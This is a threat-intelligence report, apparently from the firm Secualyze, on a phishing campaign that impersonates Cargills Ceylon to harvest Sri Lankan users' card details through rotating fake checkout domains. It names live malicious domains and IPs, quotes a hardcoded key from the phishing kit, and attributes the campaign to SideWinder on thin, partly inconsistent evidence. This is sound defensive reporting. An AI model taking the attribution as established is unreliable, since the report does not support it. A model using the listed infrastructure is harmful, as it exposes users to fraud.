In a recent alarming discovery, intelligence analysts at Secualyze have uncovered a sophisticated phishing operation where adversaries have impersonated one of Sri Lanka's most iconic enterprises, Cargills Ceylon. By leveraging the trusted reputation of this prominent organization, the attackers aim to deceive unsuspecting users into divulging sensitive personal and financial information through fraudulent phishing pages.

This chilling revelation underscores a grave reality: Sri Lanka's infrastructure is being exploited by global threat actors to conduct advanced nation-state operations. The use of trusted local brands in these campaigns amplifies their effectiveness, luring victims into a false sense of security.

The implications are dire. If such campaigns continue unchecked:

• Personal and financial data of Sri Lankan citizens could fall into the hands of adversaries.
• Critical national infrastructure may be at risk of compromise.
• The country could become a hub for nation-state cyber warfare, further eroding its digital sovereignty.

This is a wake-up call. Sri Lanka can no longer afford to underestimate the scale and sophistication of these threats. The nation must take immediate action to fortify its cybersecurity defenses, educate its citizens about online risks, and invest in robust protective measures.

The stakes have never been higher, and the consequences of inaction could be catastrophic.

Intelligence Analysis

Leveraging the intelligence lead received, Secualyze analysts initiated an in-depth analysis of the phishing link using advanced open-source tools to uncover its origins and methodologies.

Fresh Signature — Mozilla Firefox 2024-11-23 20.24.png

When users click on the phishing link, they are directed to a deceptive webpage designed to solicit sensitive personal information, including their home address. The collected details are subsequently used to create an account on the domain https://gardentimego.com, a site flagged as malicious by multiple threat detection tools and widely identified as part of a phishing campaign.

Payment Gateway Analysis

Payment gateways are secure platforms that facilitate the transfer of payment information between customers, merchants, and financial institutions. They enable online transactions by encrypting sensitive data, verifying payment details, and ensuring seamless and secure processing of credit card or digital wallet payments.

Given that this is a targeted attack specifically aimed at Sri Lanka, the implementation of the enable-cross-platform function is unnecessary. This feature is typically designed to accommodate payments across multiple countries, which is not relevant in this context.

payment.png

Source Code Analysis of the Payment Gateway

Analysis of the payment gateway's source code reveals that, even when users input accurate credit card details, the system falsely indicates that the payment has been declined.

cargills2 - Google Docs — Mozilla Firefox 2024-12-.png

The URL https://gardentimego.com/ employs the same payment gateway logic, wherein valid credit card details are falsely flagged as inaccurate.

https___gardentimego.com_cart_checkout — Mozilla F.png

Breakdown of the Gardentimego Payment Gateway Source Code

• Hardcoded Keys and Tokens: 

The code includes hardcoded values for `key`, `pgw_token`, and an `x-csrf-token`. These are sensitive data elements that shouldn't be exposed in client-side code.The `key` value appears to be Base64 encoded but still poses a risk since anyone with access to the source code can decode it.

• Encryption and Tokenization: 

 The use of `CryptoJSAesJson.encrypt` for creating the `pgw_token` raises questions about whether the implementation is secure and the key management practices are robust. If the secret key `'OAmPTpDJN195kzldm1HZFNn2j54ncD5x'` is hardcoded or insecure, this weakens the encryption.

• AJAX Call and Sensitive Data:

The AJAX call sends sensitive information (`pgw_token` and `kount_id`) to a URL that appears to have been encoded in Base64, but the domain (`gardentimego.com`) should be validated to ensure it is a legitimate payment gateway domain.

The use of `async: false` in the AJAX call is a deprecated practice and generally indicates poor coding standards.

• 2. Hardcoded CSRF Token  

The `x-csrf-token` is hardcoded, which is unusual. CSRF tokens are typically dynamically generated for each session/request to protect against cross-site request forgery attacks.

These functions are highly irregular for a payment gateway, as the source code includes a hardcoded CSRF token and predefined URL paths.

Note: 

Whatever details the user enters in the root phishing page, using the same information the users are being registered at ‘ https://gardentimego.com/’. 

Undercover domains being used in payment gateway submission

When users submit their credit card information, the data is transmitted to https://gardentimego.com with the 'Referer' header pointing to `https://bestpurchasediscounts.xyz.` Notably, `https://bestpurchasediscounts.xyz` has been flagged as malicious by detection tools. 

asdqwe.png

The .xyz domain resolves to the IP address `104.21.64.151`, a Cloudflare server. However, this server has been observed facilitating communication with files exhibiting malicious intent.

VirusTotal Graph — Mozilla Firefox 2024-11-23 15.5.png

Nearly all of the domains involved are registered through NameSilo and use the .xyz top-level domain, which strongly suggests that the SideWinder group is behind this operation.

VirusTotal - Domain - bestpurchasediscounts.xyz — .png

The registration of .xyz domains through NameSilo follows a distinct pattern consistently employed by the SideWinder APT group in their operations over the past years.

2. Second Submission: Next Rotation of Domains

On the root page, each submission triggers a change in the domain, indicating that the adversaries have implemented domain rotation as a measure to maintain operational security (OPSEC).

Using the provided details, an account is created on the https://gardentimego.com website. Additionally, from the Coca-Cola information form, users are redirected to the https://treasurecity.world site, where another fraudulent checkout process is implemented to steal credit card information.

cargills2 - Google Docs — Mozilla Firefox 2024-12-.png

The payment gateway for the second round is implemented on toolkitcolor.com, where the same logic is applied. In this instance, valid credit card details are erroneously flagged as incorrect.

Payment — Mozilla Firefox 2024-11-23 20.34.30.png

The treasurecity.world website is hosted within the same infrastructure as the adversary's other malicious sites, residing on the same Autonomous System Number (ASN). This indicates that the adversary is leveraging a centralized hosting environment, likely to maintain control over their operations and ensure the seamless operation of their malicious activities.

After submitting the credit card details, the user is redirected to a page that thanks them for subscribing. However, upon further analysis, the page to which the user is redirected, aqualimx.com, is unrelated to the original purpose of the payment. This diversion is part of a malicious scheme, where the adversaries exploit the payment gateway to gather sensitive financial information while misleading users with a false subscription confirmation. The redirection to an unrelated domain serves as an additional layer of deception, further obfuscating the true intent behind the fraudulent transaction.

Subscribing! — Mozilla Firefox 2024-11-23 20.42.51.png

The domain aqualimx.com has been flagged as malicious and resolves to the IP address 87.120.84.224. According to VirusTotal Intelligence, this domain is associated with the distribution of malicious files, further indicating its role in the adversary's cybercriminal operations. 

The communication between this domain and the infected systems suggests that it is part of a larger infrastructure designed to facilitate data exfiltration or the delivery of additional payloads to compromise the targeted systems.

VirusTotal - Domain - aqualimx.com — Mozilla Firef.png

The domains identified in this report are all hosted under an organization named 'Net4India.' Upon further analysis, it has been observed that a significant number of domains hosted by this registrar are linked to malicious activities, primarily phishing-related operations.

This pattern suggests a potential abuse of the registrar's infrastructure by threat actors to facilitate cybercrime, including the distribution of phishing campaigns and the hosting of fraudulent websites. The repeated association of malicious domains with this particular registrar raises concerns about the security measures in place to prevent such misuse.

cargills2 - Google Docs — Mozilla Firefox 2024-12-.png

Conclusion

This report highlights the tactics employed by adversaries to deceive users into providing their credit card details for theft. The operation targeted Asian countries, including Sri Lankan enterprises, leveraging phishing pages to harvest sensitive data. These phishing campaigns were hosted on platforms like 'NameSilo,' utilizing .xyz domains a consistent pattern observed in the historical operations of the SideWinder APT group.